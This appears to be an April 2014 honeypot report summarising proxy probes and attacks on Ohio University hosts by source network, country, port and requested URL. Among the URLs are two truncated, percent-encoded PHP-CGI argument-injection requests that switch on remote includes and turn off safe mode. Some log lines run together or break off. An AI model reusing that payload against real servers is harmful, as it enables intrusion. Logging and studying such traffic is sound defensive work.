Proxy Attack Summaries 2014/04/01 thru 2014/04/30

Sorted by Source Network Range
Sorted by Total Connections From Source Network
Sorted by Source Country
Sorted by Total Connections From Source Country
Counts by fetch target URL.
Counts by fetch target URL - sorted by URL in rev. domain order.

Sorted by Source Network Range


Source Network Registered owner Local Target IP or range Target Ports
24.160.0.0 - 24.170.127.255 Time Warner Cable Internet LLC Herndon, VA, US attacked 132.235.1.14 for ports 50070x3
27.106.22.0 - 27.106.22.255 Syscon Infoway Pvt. Ltd. IN attacked MULTIPLE-IPs for ports 111x2 53x2 32775 27000 4045 515 32776
27.130.128.0 - 27.130.255.255 3BB Broadband Internet service Thailand 200 Jasmine tower 29th floor Chaengwattana road TH attacked 132.235.4.130 for ports 80x2
36.224.0.0 - 36.239.255.255 Data Communication Business Group, Chunghwa Telecom Co.,Ltd. No.21, Sec.1, Xinyi Rd., Taipei City 10048, Taiwan TW attacked 132.235.1.2 for ports 80
46.36.221.0 - 46.36.221.255 FastVPS network for VPS EE attacked 132.235.3.154 for ports 5222x9
46.147.72.0 - 46.147.79.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x273 995x20 993x20 111x20
46.147.80.0 - 46.147.87.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x638 111x44 993x40 995x41
46.147.88.0 - 46.147.95.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x321 993x24 111x21 995x24
50.22.0.0 - 50.23.255.255 SoftLayer Technologies Inc. Dallas, TX, US attacked MULTIPLE-IPS for ports 80x10
58.20.59.128 - 58.20.59.255 Changsha-Liu-Yang-DIA-3552-DDN-Net2 CNC Group CHINA169 Hunan Province Network CN attacked MULTIPLE-IPS for ports 80x3
58.208.0.0 - 58.223.255.255 CHINANET jiangsu province network China Telecom A12,Xin-Jie-Kou-Wai Street CN attacked 132.235.4.130 for ports 80
67.221.240.0 - 67.221.255.255 6connect, Inc. San Jose, CA, US attacked MULTIPLE-IPS for ports 80x6
68.64.167.64 - 68.64.167.79 Shiwang Liang Yulin, GUANGXI, CN attacked 132.235.1.249 for ports 23
82.124.152.0 - 82.124.152.255 BSPUT652 Puteaux Bloc 2 France Telecom FR attacked 132.235.15.158 for ports 5432
87.106.80.0 - 87.106.95.255 1&1 Internet AG DE attacked 132.235.3.154 for ports 80x9
88.80.9.0 - 88.80.10.255 prq Inet POP STH0 Co-located customer servers SE attacked MULTIPLE-IPs for ports 80x11202
91.230.107.0 - 91.230.107.255 LLC Wildberries Alexey Smirnov vladenie 1 142715 Milkovo RUSSIAN FEDERATION RU attacked 132.235.1.249 for ports 21x18
92.240.68.0 - 92.240.69.255 Institute of Mathematics and Computer Science of University of Latvia IMCS UL Raina bulvaris 29 LV-1459 Riga LATVIA LV attacked 132.235.3.141 for ports 80
93.174.93.0 - 93.174.93.255 ECATEL LTD Dedicated servers http://www.ecatel.net/ NL attacked MULTIPLE-IPs for ports 80x17 6789x5
95.78.0.0 - 95.78.7.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x83 32772x6 993x7 995x7 111x7
95.78.8.0 - 95.78.15.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x14 993 995 111
95.78.24.0 - 95.78.31.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x799 111x47 995x59 993x58
95.78.48.0 - 95.78.55.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x66 111x5 995x4 993x3
95.78.56.0 - 95.78.63.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x136 111x11 995x11 993x11 32772x4
95.78.64.0 - 95.78.127.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x321 993x37 111x22 995x37 32772x2
108.0.0.0 - 108.57.255.255 Verizon Online LLC Ashburn, VA, US attacked 132.235.4.130 for ports 80x5
109.201.143.192 - 109.201.143.255 Customer 627 / OneHop Network Solutions Ltd. NL attacked 132.235.2.1 for ports 53
113.112.0.0 - 113.119.255.255 CHINANET Guangdong province network Data Communication Division CN attacked 132.235.1.2 for ports 80
114.24.0.0 - 114.27.255.255 Data Communication Business Group, Chunghwa Telecom Co.,Ltd. No.21, Sec.1, Xinyi Rd., Taipei City 10048, Taiwan TW attacked 132.235.1.2 for ports 80
115.148.0.0 - 115.151.255.255 CHINANET JIANGXI PROVINCE NETWORK China Telecom No.31,jingrong street CN attacked 132.235.1.164 for ports 80
115.158.128.0 - 115.158.159.255 ~{;F:S?F< attacked MULTIPLE-IPS for ports 80x3
123.240.0.0 - 123.241.255.255 TBC 3F,NO.10 Ta-Yieh Road, Pei-Tou District. Taipei Taiwan 112 TW attacked 132.235.3.154 for ports 80
125.110.0.0 - 125.110.255.255 CHINANET-ZJ Wenzhou node network CN attacked MULTIPLE-IPs for ports 80x3
132.235.0.0 - 132.235.255.255 Ohio University Athens, OH, US attacked 132.235.4.130 for ports 80x5
146.151.0.0 - 146.151.255.255 University of Wisconsin Madison Madison, WI, US attacked MULTIPLE-IPS for ports 80x3
162.213.24.0 - 162.213.31.255 VolumeDrive Clarks Summit, PA, US attacked 132.235.1.2 for ports 80
182.84.0.0 - 182.87.255.255 CHINANET JIANGXI PROVINCE NETWORK China Telecom No.31,jingrong street CN attacked MULTIPLE-IPS for ports 80x2
183.0.0.0 - 183.63.255.255 CHINANET Guangdong province network Data Communication Division CN attacked MULTIPLE-IPs for ports 80x6
183.192.0.0 - 183.255.255.255 China Mobile Communications Corporation Mobile Communications Network Operator in China Internet Service Provider in China CN attacked 132.235.1.1 for ports 80
185.4.227.0 - 185.4.227.255 Istanbul DC Customer TR attacked MULTIPLE-IPs for ports 80x53
189.112/16 ALGAR TELECOM S/A (23118) ?? attacked MULTIPLE-IPS for ports 80x12
199.47.80.0 - 199.47.87.255 iParadigms, LLC Oakland, CA, US attacked 132.235.4.130 for ports 80
199.87.232.0 - 199.87.239.255 eSited Solutions Los Angeles, CA, US attacked 132.235.3.154 for ports 80
217.160.88.0 - 217.160.95.255 1&1 Internet AG 1&1 Internet AG Axel Fischer Brauerstr.48 76135 Karlsruhe GERMANY DE attacked MULTIPLE-IPs for ports 32772 80x14 995 993 111
218.0.192.0 - 218.0.255.255 CHINANET-ZJ Hangzhou node network CN attacked 132.235.3.154 for ports 80
218.206.192.0 - 218.206.255.255 China Mobile Communications Corporation - henan CN attacked MULTIPLE-IPS for ports 80x3
221.10.0.0 - 221.10.255.255 China Unicom SiChuan province network China Unicom CN attacked MULTIPLE-IPs for ports 6000x2 53 80
222.32.0.0 - 222.63.255.255 China TieTong Telecommunications Corporation Jinze Mansion, 2 Guangningbo Street, CN attacked MULTIPLE-IPS for ports 80x3

Sorted By Total Connections From Source Network

Count Source Network Registered Owner Local Target IP or Range Target Ports
1 36.224.0.0 - 36.239.255.255 Data Communication Business Group, Chunghwa Telecom Co.,Ltd. No.21, Sec.1, Xinyi Rd., Taipei City 10048, Taiwan TW attacked 132.235.1.2 for ports 80
1 58.208.0.0 - 58.223.255.255 CHINANET jiangsu province network China Telecom A12,Xin-Jie-Kou-Wai Street CN attacked 132.235.4.130 for ports 80
1 68.64.167.64 - 68.64.167.79 Shiwang Liang Yulin, GUANGXI, CN attacked 132.235.1.249 for ports 23
1 82.124.152.0 - 82.124.152.255 BSPUT652 Puteaux Bloc 2 France Telecom FR attacked 132.235.15.158 for ports 5432
1 92.240.68.0 - 92.240.69.255 Institute of Mathematics and Computer Science of University of Latvia IMCS UL Raina bulvaris 29 LV-1459 Riga LATVIA LV attacked 132.235.3.141 for ports 80
1 109.201.143.192 - 109.201.143.255 Customer 627 / OneHop Network Solutions Ltd. NL attacked 132.235.2.1 for ports 53
1 113.112.0.0 - 113.119.255.255 CHINANET Guangdong province network Data Communication Division CN attacked 132.235.1.2 for ports 80
1 114.24.0.0 - 114.27.255.255 Data Communication Business Group, Chunghwa Telecom Co.,Ltd. No.21, Sec.1, Xinyi Rd., Taipei City 10048, Taiwan TW attacked 132.235.1.2 for ports 80
1 115.148.0.0 - 115.151.255.255 CHINANET JIANGXI PROVINCE NETWORK China Telecom No.31,jingrong street CN attacked 132.235.1.164 for ports 80
1 123.240.0.0 - 123.241.255.255 TBC 3F,NO.10 Ta-Yieh Road, Pei-Tou District. Taipei Taiwan 112 TW attacked 132.235.3.154 for ports 80
1 162.213.24.0 - 162.213.31.255 VolumeDrive Clarks Summit, PA, US attacked 132.235.1.2 for ports 80
1 183.192.0.0 - 183.255.255.255 China Mobile Communications Corporation Mobile Communications Network Operator in China Internet Service Provider in China CN attacked 132.235.1.1 for ports 80
1 199.47.80.0 - 199.47.87.255 iParadigms, LLC Oakland, CA, US attacked 132.235.4.130 for ports 80
1 199.87.232.0 - 199.87.239.255 eSited Solutions Los Angeles, CA, US attacked 132.235.3.154 for ports 80
1 218.0.192.0 - 218.0.255.255 CHINANET-ZJ Hangzhou node network CN attacked 132.235.3.154 for ports 80
2 27.130.128.0 - 27.130.255.255 3BB Broadband Internet service Thailand 200 Jasmine tower 29th floor Chaengwattana road TH attacked 132.235.4.130 for ports 80x2
2 182.84.0.0 - 182.87.255.255 CHINANET JIANGXI PROVINCE NETWORK China Telecom No.31,jingrong street CN attacked MULTIPLE-IPS for ports 80x2
3 24.160.0.0 - 24.170.127.255 Time Warner Cable Internet LLC Herndon, VA, US attacked 132.235.1.14 for ports 50070x3
3 58.20.59.128 - 58.20.59.255 Changsha-Liu-Yang-DIA-3552-DDN-Net2 CNC Group CHINA169 Hunan Province Network CN attacked MULTIPLE-IPS for ports 80x3
3 115.158.128.0 - 115.158.159.255 ~{;F:S?F< attacked MULTIPLE-IPS for ports 80x3
3 125.110.0.0 - 125.110.255.255 CHINANET-ZJ Wenzhou node network CN attacked MULTIPLE-IPs for ports 80x3
3 146.151.0.0 - 146.151.255.255 University of Wisconsin Madison Madison, WI, US attacked MULTIPLE-IPS for ports 80x3
3 218.206.192.0 - 218.206.255.255 China Mobile Communications Corporation - henan CN attacked MULTIPLE-IPS for ports 80x3
3 222.32.0.0 - 222.63.255.255 China TieTong Telecommunications Corporation Jinze Mansion, 2 Guangningbo Street, CN attacked MULTIPLE-IPS for ports 80x3
4 221.10.0.0 - 221.10.255.255 China Unicom SiChuan province network China Unicom CN attacked MULTIPLE-IPs for ports 6000x2 53 80
5 108.0.0.0 - 108.57.255.255 Verizon Online LLC Ashburn, VA, US attacked 132.235.4.130 for ports 80x5
5 132.235.0.0 - 132.235.255.255 Ohio University Athens, OH, US attacked 132.235.4.130 for ports 80x5
6 67.221.240.0 - 67.221.255.255 6connect, Inc. San Jose, CA, US attacked MULTIPLE-IPS for ports 80x6
6 183.0.0.0 - 183.63.255.255 CHINANET Guangdong province network Data Communication Division CN attacked MULTIPLE-IPs for ports 80x6
9 27.106.22.0 - 27.106.22.255 Syscon Infoway Pvt. Ltd. IN attacked MULTIPLE-IPs for ports 111x2 53x2 32775 27000 4045 515 32776
9 46.36.221.0 - 46.36.221.255 FastVPS network for VPS EE attacked 132.235.3.154 for ports 5222x9
9 87.106.80.0 - 87.106.95.255 1&1 Internet AG DE attacked 132.235.3.154 for ports 80x9
10 50.22.0.0 - 50.23.255.255 SoftLayer Technologies Inc. Dallas, TX, US attacked MULTIPLE-IPS for ports 80x10
12 189.112/16 ALGAR TELECOM S/A (23118) ?? attacked MULTIPLE-IPS for ports 80x12
17 95.78.8.0 - 95.78.15.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x14 993 995 111
18 91.230.107.0 - 91.230.107.255 LLC Wildberries Alexey Smirnov vladenie 1 142715 Milkovo RUSSIAN FEDERATION RU attacked 132.235.1.249 for ports 21x18
18 217.160.88.0 - 217.160.95.255 1&1 Internet AG 1&1 Internet AG Axel Fischer Brauerstr.48 76135 Karlsruhe GERMANY DE attacked MULTIPLE-IPs for ports 32772 80x14 995 993 111
22 93.174.93.0 - 93.174.93.255 ECATEL LTD Dedicated servers http://www.ecatel.net/ NL attacked MULTIPLE-IPs for ports 80x17 6789x5
53 185.4.227.0 - 185.4.227.255 Istanbul DC Customer TR attacked MULTIPLE-IPs for ports 80x53
78 95.78.48.0 - 95.78.55.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x66 111x5 995x4 993x3
110 95.78.0.0 - 95.78.7.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x83 32772x6 993x7 995x7 111x7
173 95.78.56.0 - 95.78.63.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x136 111x11 995x11 993x11 32772x4
333 46.147.72.0 - 46.147.79.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x273 995x20 993x20 111x20
390 46.147.88.0 - 46.147.95.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x321 993x24 111x21 995x24
419 95.78.64.0 - 95.78.127.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x321 993x37 111x22 995x37 32772x2
763 46.147.80.0 - 46.147.87.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x638 111x44 993x40 995x41
963 95.78.24.0 - 95.78.31.255 CJSC "ER-Telecom Holding" Naberezhnye Chelny branch RU attacked MULTIPLE-IPs for ports 80x799 111x47 995x59 993x58
11202 88.80.9.0 - 88.80.10.255 prq Inet POP STH0 Co-located customer servers SE attacked MULTIPLE-IPs for ports 80x11202

Summarized By Source Country

Source Country Local Target IP or Range Target Ports
?? attacked MULTIPLE-IPS for ports 80x12
CN attacked MULTIPLE-IPs for ports 80x29 23 6000x2 53
DE attacked MULTIPLE-IPs for ports 80x23 32772 995 993 111
EE attacked 132.235.3.154 for ports 5222x9
FR attacked 132.235.15.158 for ports 5432
IN attacked MULTIPLE-IPs for ports 111x2 53x2 32775 27000 4045 515 32776
LV attacked 132.235.3.141 for ports 80
NL attacked MULTIPLE-IPs for ports 80x17 6789x5 53
RU attacked MULTIPLE-IPs for ports 80x2651 995x204 993x201 111x178 21x18 32772x12
SE attacked MULTIPLE-IPs for ports 80x11202
TH attacked 132.235.4.130 for ports 80x2
TR attacked MULTIPLE-IPs for ports 80x53
TW attacked MULTIPLE-IPs for ports 80x3
US attacked MULTIPLE-IPs for ports 50070x3 80x32

Summarized By Source Country

Total Connection Counts Source Country Local Target IP or Range Target Ports
1 FR attacked 132.235.15.158 for ports 5432
1 LV attacked 132.235.3.141 for ports 80
2 TH attacked 132.235.4.130 for ports 80x2
3 TW attacked MULTIPLE-IPs for ports 80x3
9 EE attacked 132.235.3.154 for ports 5222x9
9 IN attacked MULTIPLE-IPs for ports 111x2 53x2 32775 27000 4045 515 32776
12 ?? attacked MULTIPLE-IPS for ports 80x12
23 NL attacked MULTIPLE-IPs for ports 80x17 6789x5 53
27 DE attacked MULTIPLE-IPs for ports 80x23 32772 995 993 111
33 CN attacked MULTIPLE-IPs for ports 80x29 23 6000x2 53
35 US attacked MULTIPLE-IPs for ports 50070x3 80x32
53 TR attacked MULTIPLE-IPs for ports 80x53
3264 RU attacked MULTIPLE-IPs for ports 80x2651 995x204 993x201 111x178 21x18 32772x12
11202 SE attacked MULTIPLE-IPs for ports 80x11202

Summarized By Target URL to Fetch - sorted by attempts made

Count Target host name GET/PUT/etc Target URL to Fetch
1 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDY%40ZY
1 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYACF%5DF
1 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCZY
1 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCZYU
1 cat.edu.pk GET /download/33-cat-download.aspx
1 px1.cs.ohio.edu:50070 GET /favicon.ico
1 vital.cs.ohio.edu GET /wp-content/themes/titan/style.css
1 vital.cs.ohio.edu GET /wp-includes/js/comment-reply.js?ver=20090102
1 vital.cs.ohio.edu GET /wp-includes/js/l10n.js?ver=20101110
1 vital.cs.ohio.edu GET /wp-includes/js/prototype.js?ver=1.6.12014/04/16-09:05:30.355239 132.235.1.54 proxy probe 132.235.4.130 : 80 host: vital.cs.ohio.edu - GET /wp-includes/js/scriptaculous/effects.js?ver=1.8.3
1 vital.cs.ohio.edu GET /wp-includes/js/scriptaculous/wp-scriptaculous.js?ver=1.8.3
1 w3-hidden.cc GET http://w3-hidden.cc/checker.php
1 www.anonymitytest.com GET http://www.anonymitytest.com/cgi-bin/textenv.pl
1 www.aps.org GET http://www.aps.org/
1 www.baidusystem.com GET http://www.baidusystem.com/proxyheader.php
1 www.ebay.com GET /CFIDE/h.cfm
1 www.passmyexams.co.uk GET http://www.passmyexams.co.uk : /GCSE/biology/images/swallowing.jpg
2 check2.zennolab.com POST http://check2.zennolab.com/proxy.php
2 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/21-20:21:52.345350 46.147.95.17 proxy probe 132.235.1.123 : 111 2 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
2 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/24-07:55:15.831445 95.78.25.212 proxy probe 132.235.1.123 : 111 2 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
2 px1.cs.ohio.edu:50070 GET /dfshealth.jsp
2 thepioneer.gatech.edu GET /wp-login.php
2 www.google.com CONNECT www.google.com:443
3 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYACFUBS
3 chekfast.zennolab.com GET h
3 pubs.acs.org GET http://pubs.acs.org/doi/abs/10.1021/jm900999h?prevSearch=Colistin&searchHistoryKey=
3 www.sina.com.cn GET http://www.sina.com.cn/
4 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDY%40Z%5DV
4 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYPO
4 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYQ%40
4 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYQB
4 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYQC
4 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/18-11:59:49.473579 95.78.83.136 proxy probe 132.235.1.123 : 111 7 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
4 www.bbcworldwide.com GET http://www.bbcworldwide.com/
4 www.google.com GET http://www.google.com/
5 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYPF
5 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCAFUBZ
5 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCAFUGS
5 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCZYRC
5 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/19-11:32:56.644440 95.78.83.136 proxy probe 132.235.1.123 : 111 8 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
5 ipv4scan.com GET http://ipv4scan.com/hello/check.txt
5 www.messedupshit.com GET http://www.messedupshit.com/judgeme/azenv.php
6 24x7-allrequestsallowed.com GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYFZYWG
6 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/18-00:11:00.803395 95.78.28.240 proxy probe 132.235.1.123 : 111 4 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
6 www.baidu.com GET http://www.baidu.com/
6 www.w3.org GET http://www.w3.org/
7 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/23-15:37:55.363256 95.78.25.212 proxy probe 132.235.1.123 : 111 6 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
7 chek.zennolab.com POST http://chek.zennolab.com/proxy.php
9 proxy.loresoft.de/ POST http://proxy.loresoft.de/cron/checksum.html HTTP/1.0r
9 www.sciencedirect.com GET http://www.sciencedirect.com/
9 www.work.ny-market.ru POST http://www.work.ny-market.ru/proxy5/check.php
10 -c POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%6
10 proxyjudge3.proxyfire.net GET http://proxyjudge3.proxyfire.net/fastenv
12 -h POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%6
12 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/21-20:13:34.262283 46.147.95.17 proxy probe MULTIPLE-IPS : 80 19 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
17 test GET /HNAP1/
18 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/24-23:56:38.596229 95.78.58.138 proxy probe MULTIPLE-IPS : 80 18 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
34 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/24-05:56:42.736509 95.78.25.212 proxy probe MULTIPLE-IPS : 80 21 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
60 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/19-06:43:46.001491 95.78.83.136 proxy probe MULTIPLE-IPS : 80 110 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
62 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/18-11:59:47.365608 95.78.83.136 proxy probe MULTIPLE-IPS : 80 83 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
71 chek.zennolab.com GET http://chek.zennolab.com/proxy.php2014/04/17-06:55:45.977711 95.78.28.240 proxy probe MULTIPLE-IPS : 80 48 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
765 chek.zennolab.com GET http://chek.zennolab.com/proxy.php
850 chekfast.zennolab.com GET http://chekfast.zennolab.com/proxy.php
1378 check2.zennolab.com GET http://check2.zennolab.com/proxy.php
11202 spam-chaos.com GET http://spam-chaos.com/pp/set-cookie.php

Summarized By Target URL to Fetch - sorted in reverse domain order

Target host name Count GET/PUT/etc Target URL to Fetch
-c 10 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%6
-h 12 POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%6
24x7-allrequestsallowed.com 4 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDY%40Z%5DV
24x7-allrequestsallowed.com 1 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDY%40ZY
24x7-allrequestsallowed.com 1 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYACF%5DF
24x7-allrequestsallowed.com 3 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYACFUBS
24x7-allrequestsallowed.com 5 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYPF
24x7-allrequestsallowed.com 4 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYPO
24x7-allrequestsallowed.com 4 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYQ%40
24x7-allrequestsallowed.com 4 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYQB
24x7-allrequestsallowed.com 4 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYAZYQC
24x7-allrequestsallowed.com 5 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCAFUBZ
24x7-allrequestsallowed.com 5 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCAFUGS
24x7-allrequestsallowed.com 1 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCZY
24x7-allrequestsallowed.com 5 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCZYRC
24x7-allrequestsallowed.com 1 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYCZYU
24x7-allrequestsallowed.com 6 GET http://24x7-allrequestsallowed.com/?PHPSESSID=1rmsxtj500143PQQJTUDYFZYWG
cat.edu.pk 1 GET /download/33-cat-download.aspx
check2.zennolab.com 1378 GET http://check2.zennolab.com/proxy.php
check2.zennolab.com 2 POST http://check2.zennolab.com/proxy.php
chek.zennolab.com 765 GET http://chek.zennolab.com/proxy.php
chek.zennolab.com 71 GET http://chek.zennolab.com/proxy.php2014/04/17-06:55:45.977711 95.78.28.240 proxy probe MULTIPLE-IPS : 80 48 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 6 GET http://chek.zennolab.com/proxy.php2014/04/18-00:11:00.803395 95.78.28.240 proxy probe 132.235.1.123 : 111 4 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 62 GET http://chek.zennolab.com/proxy.php2014/04/18-11:59:47.365608 95.78.83.136 proxy probe MULTIPLE-IPS : 80 83 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 4 GET http://chek.zennolab.com/proxy.php2014/04/18-11:59:49.473579 95.78.83.136 proxy probe 132.235.1.123 : 111 7 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 60 GET http://chek.zennolab.com/proxy.php2014/04/19-06:43:46.001491 95.78.83.136 proxy probe MULTIPLE-IPS : 80 110 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 5 GET http://chek.zennolab.com/proxy.php2014/04/19-11:32:56.644440 95.78.83.136 proxy probe 132.235.1.123 : 111 8 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 12 GET http://chek.zennolab.com/proxy.php2014/04/21-20:13:34.262283 46.147.95.17 proxy probe MULTIPLE-IPS : 80 19 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 2 GET http://chek.zennolab.com/proxy.php2014/04/21-20:21:52.345350 46.147.95.17 proxy probe 132.235.1.123 : 111 2 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 7 GET http://chek.zennolab.com/proxy.php2014/04/23-15:37:55.363256 95.78.25.212 proxy probe 132.235.1.123 : 111 6 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 34 GET http://chek.zennolab.com/proxy.php2014/04/24-05:56:42.736509 95.78.25.212 proxy probe MULTIPLE-IPS : 80 21 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 2 GET http://chek.zennolab.com/proxy.php2014/04/24-07:55:15.831445 95.78.25.212 proxy probe 132.235.1.123 : 111 2 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 18 GET http://chek.zennolab.com/proxy.php2014/04/24-23:56:38.596229 95.78.58.138 proxy probe MULTIPLE-IPS : 80 18 times host: chekfast.zennolab.com - GET http://chekfast.zennolab.com/proxy.php
chek.zennolab.com 7 POST http://chek.zennolab.com/proxy.php
chekfast.zennolab.com 3 GET h
